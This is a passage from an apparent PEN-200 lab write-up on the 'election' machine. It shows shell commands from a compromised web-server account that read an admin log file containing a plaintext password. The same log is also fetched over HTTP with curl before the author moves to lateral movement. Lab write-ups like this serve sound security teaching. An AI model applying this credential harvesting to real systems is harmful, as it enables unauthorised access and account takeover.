Web Log
Checking the web root directory for hidden credentials after performing a manual enumeration on the election host.
www-data@election:/var/www/html/election/admin/logs$ ll
total 12K
4.0K -rw-r--r-- 1 www-data www-data 367 Jul 2 01:54 system.log
4.0K drwxr-xr-x 2 www-data www-data 4.0K May 27 2020 .
4.0K drwxr-xr-x 10 www-data www-data 4.0K Apr 3 2020 ..
www-data@election:/var/www/html/election/admin/logs$ cat system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2025-07-02 00:18:02] Love has been logged in from Unknown IP on Chrome (Linux).
[2025-07-02 01:54:04] Love has been logged in from Unknown IP on Chrome (Linux).Credential of the love user is hard-coded into the log file; /var/www/html/election/admin/logs/system.log
love:P@$$w0rd@123
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ curl -s http://$IP/election/admin/logs/system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
[2025-07-02 00:18:02] Love has been logged in from Unknown IP on Chrome (Linux).
[2025-07-02 01:54:04] Love has been logged in from Unknown IP on Chrome (Linux).This could have been accessed early Moving on to the Lateral Movement phase.